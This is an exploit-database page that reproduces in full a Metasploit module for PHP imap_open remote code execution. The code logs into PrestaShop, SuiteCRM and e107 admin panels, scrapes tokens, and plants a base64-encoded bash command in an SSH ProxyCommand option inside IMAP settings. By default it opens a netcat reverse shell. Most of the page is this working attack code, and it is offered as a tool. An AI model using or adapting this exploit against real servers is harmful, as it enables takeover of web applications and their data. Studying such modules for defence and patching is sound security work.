PHP imap_open Remote Code Execution
CVE
Category
Price
Severity
CVE-_____
CWE-XXX
Not Specified
High
Author
Risk
Exploitation Type
Date
Not Specified
High
Remote
2018-11-29
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required High PR The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files. Scope S An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018110246 PHP imap_open Remote Code Execution ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'php imap_open Remote Code Execution',
'Description' => %q{
The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand
option can be passed from imap_open to execute arbitrary commands.
While many custom applications may use imap_open, this exploit works against the following applications:
e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.
Prestashop exploitation requires the admin URI, and administrator credentials.
suiteCRM/e107/hostcms require administrator credentials.
},
'Author' =>
[
'Anton Lopanitsyn', # Vulnerability discovery and PoC
'Twoster', # Vulnerability discovery and PoC
'h00die' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
[ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],
[ 'EDB', '45865']
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'prestashop', {} ],
[ 'suitecrm', {}],
[ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron
[ 'custom', {'WfsDelay' => 300}]
],
'PrependFork' => true,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'WfsDelay' => 120
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 23 2018'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']),
OptString.new('USERNAME', [ false, "Username to authenticate with", '']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
])
end
def check
if target.name =~ /prestashop/
uri = normalize_uri(target_uri.path)
res = send_request_cgi({'uri' => uri})
if res && (res.code == 301 || res.code == 302)
return CheckCode::Detected
end
elsif target.name =~ /suitecrm/
#login page GET /index.php?action=Login&module=Users
vprint_status('Loading login page')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'action' => 'Login',
'module' => 'Users'
}
)
unless res
print_error('Error loading site. Check options.')
return
end
if res.code = 200
return CheckCode::Detected
end
end
CheckCode::Safe
end
def command(spaces='$IFS$()')
#payload is base64 encoded, and stuffed into the SSH option.
enc_payload = Rex::Text.encode_base64(payload.encoded)
command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`"
#final payload can not contain spaces, however $IFS$() will return the space we require
command.gsub!(' ', spaces)
end
def exploit
if target.name =~ /prestashop/
uri = normalize_uri(target_uri.path)
res = send_request_cgi({'uri' => uri})
if res && res.code != 301
print_error('Admin redirect not found, check URI. Should be something similar to /admin2769gx8k3')
return
end
#There are a bunch of redirects that happen, so we automate going through them to get to the login page.
while res.code == 301 || res.code == 302
cookie = res.get_cookies
uri = res.headers['Location']
vprint_status("Redirected to #{uri}")
res = send_request_cgi({'uri' => uri})
end
#Tokens are generated for each URL or sub-component, we need valid ones!
/.*token=(?<token>\w{32})/ =~ uri
/id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
cookie = res.get_cookies
unless token && redirect
print_error('Unable to find token and redirect URL, check options.')
return
end
vprint_status("Token: #{token} and Login Redirect: #{redirect}")
print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
'vars_post' => {
'ajax' => 1,
'token' => '',
'controller' => 'AdminLogin',
'submitLogin' => '1',
'passwd' => datastore['PASSWORD'],
'email' => datastore['USERNAME'],
'redirect' => redirect
},
'vars_get' => {
'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
}
)
if res && res.body.include?('Invalid password')
print_error('Invalid Login')
return
end
vprint_status("Login JSON Response: #{res.body}")
uri = JSON.parse(res.body)['redirect']
cookie = res.get_cookies
print_good('Login Success, loading admin dashboard to pull tokens')
res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
/AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body
vprint_status("Customer Threads Token: #{token}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
'vars_get' => {
'controller' => 'AdminCustomerThreads',
'token' => token
}
})
/form method="post" action="index\.php\?controller=AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body
print_good("Sending Payload with Final Token: #{token}")
data = Rex::MIME::Message.new
data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"')
data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"')
data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"')
data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"')
data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"')
data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"')
data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"')
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,
'vars_get' => {
'controller' => 'AdminCustomerThreads',
'token' => token
}
)
print_status('IMAP server change left on server, manual revert required.')
if res && res.body.include?('imap Is Not Installed On This Server')
print_error('PHP IMAP mod not installed/enabled ')
end
elsif target.name =~ /suitecrm/
#login page GET /index.php?action=Login&module=Users
vprint_status('Loading login page')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'action' => 'Login',
'module' => 'Users'
}
)
unless res
print_error('Error loading site. Check options.')
return
end
if res.code = 200
cookie = res.get_cookies
else
print_error("HTTP code #{res.code} found, check options.")
return
end
vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
'vars_post' => {
'module' => 'Users',
'action' => 'Authenticate',
'return_module' => 'Users',
'return_action' => 'Login',
'cant_login' => '',
'login_module' => '',
'login_action' => '',
'login_record' => '',
'login_token' => '',
'login_oauth_token' => '',
'login_mobile' => '',
'user_name' => datastore['USERNAME'],
'username_password' => datastore['PASSWORD'],
'Login' => 'Log+In'
}
)
unless res
print_error('Error loading site. Check options.')
return
end
if res.code = 302
cookie = res.get_cookies
print_good('Login Success')
else
print_error('Failed Login, check options.')
end
#load the email settings page to get the group_id
vprint_status('Loading InboundEmail page')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
'vars_get' => {
'module' => 'InboundEmail',
'action' => 'EditView'
}
)
unless res
print_error('Error loading site.')
return
end
/"group_id" value="(?<group_id>\w{8}-\w{4}-\w{4}-\w{4}-\w{12})">/ =~ res.body
unless group_id
print_error('Could not identify group_id from form page')
return
end
print_good("Sending payload with group_id #{group_id}")
referer = "http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView"
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => cookie,
#required to prevent CSRF protection from triggering
'headers' => { 'Referer' => referer},
'vars_post' => {
'module' => 'InboundEmail',
'record' => '',
'origin_id' => '',
'isDuplicate' => 'false',
'action' => 'Save',
'group_id' => group_id,
'return_module' => '',
'return_action' => '',
'return_id' => '',
'personal' => '',
'searchField' => '',
'mailbox_type' => '',
'button' => ' Save ',
'name' => Rex::Text.rand_text_alphanumeric(8),
'status' => 'Active',
'server_url' => "x #{command}}",
'email_user' => Rex::Text.rand_text_alphanumeric(8),
'protocol' => 'imap',
'email_password' => Rex::Text.rand_text_alphanumeric(8),
'port' => '143',
'mailbox' => 'INBOX',
'trashFolder' => 'TRASH',
'sentFolder' => '',
'from_name' => Rex::Text.rand_text_alphanumeric(8),
'is_auto_import' => 'on',
'from_addr' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org",
'reply_to_name' => '',
'distrib_method' => 'AOPDefault',
'distribution_user_name' => '',
'distribution_user_id' => '',
'distribution_options[0]' => 'all',
'distribution_options[1]' => '',
'distribution_options[2]' => '',
'create_case_template_id' => '',
'reply_to_addr' => '',
'template_id' => '',
'filter_domain' => '',
'email_num_autoreplies_24_hours' => '10',
'leaveMessagesOnMailServer' => '1'
}
)
if res && res.code == 200
print_error('Triggered CSRF protection, may try exploitation manually.')
end
print_status('IMAP server config left on server, manual removal required.')
elsif target.name =~ /e107v2/
# e107 has an encoder which prevents $IFS$() from being used as $ = $
# \t also became /t, however "\t" does seem to work.
# e107 also uses a cron job to check bounce jobs, which may not be active.
# either cron can be disabled, or bounce checks disabled, so we try to
# kick the process manually, however if it doesn't work we'll hope
# cron is running and we get a call back anyways.
vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),
'vars_post' => {
'authname' => datastore['USERNAME'],
'authpass' => datastore['PASSWORD'],
'authsubmit' => 'Log In'
})
unless res
print_error('Error loading site. Check options.')
return
end
if res.code == 302
cookie = res.get_cookies
print_good('Login Success')
else
print_error('Failed Login, check options.')
end
vprint_status('Checking if Cron is enabled for triggering')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
'cookie' => cookie
)
unless res
print_error('Error loading site. Check options.')
return
end
if res.body.include? 'Status: <b>Disabled</b>'
print_error('Cron disabled, unexploitable.')
return
end
print_good('Storing payload in mail settings')
# the imap/pop field is hard to find. Check Users > Mail
# then check "Bounced emails - Processing method" and set it to "Mail account"
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),
'cookie' => cookie,
'vars_get' => {
'mode' => 'prefs',
'action' => 'prefs'
},
'vars_post' => {
'testaddress' => '[email protected] ',
'testtemplate' => 'textonly',
'bulkmailer' => 'smtp',
'smtp_server' => '1.1.1.1',
'smtp_username' => 'username',
'smtp_password' => 'password',
'smtp_port' => '25',
'smtp_options' => '',
'smtp_keepalive' => '0',
'smtp_useVERP' => '0',
'mail_sendstyle' => 'texthtml',
'mail_pause' => '3',
'mail_pausetime' => '4',
'mail_workpertick' => '5',
'mail_log_option' => '0',
'mail_bounce' => 'mail',
'mail_bounce_email2' => '',
'mail_bounce_email' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org",
'mail_bounce_pop3' => "x #{command("\t")}}",
'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),
'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),
'mail_bounce_type' => 'imap',
'mail_bounce_auto' => '1',
'updateprefs' => 'Save Changes'
})
vprint_status('Loading cron page to execute job manually')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
'cookie' => cookie
)
unless res
print_error('Error loading site. Check options.')
return
end
if /name='e-token' value='(?<etoken>\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\[(?<cron_id>\d)\]/m =~ res.body
print_good("Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}")
# The post request has several duplicate columns, however all were not required. Left them commented for documentation purposes
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
'cookie' => cookie,
'vars_post' => {
'e-token' => etoken,
#'e-columns[]' => 'cron_category',
'e-columns[]' => 'cron_name',
#'e-columns[]' => 'cron_description',
#'e-columns[]' => 'cron_function',
#'e-columns[]' => 'cron_tab',
#'e-columns[]' => 'cron_lastrun',
#'e-columns[]' => 'cron_active',
"cron_execute[#{cron_id}]" => '1',
'etrigger_batch' => ''
})
else
print_error('e-token not found, required for manual exploitation. Wait 60sec, cron may still trigger.')
end
print_status('IMAP server config left on server, manual removal required.')
elsif target.name =~ /custom/
print_status('Listener started for 300 seconds')
print_good("POST request connection string: x #{command}}")
# URI.encode leaves + as + since that's a space encoded. So we manually change it.
print_good("GET request connection string: #{URI.encode("x " + command + "}").sub! '+', '%2B'}")
end
end
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum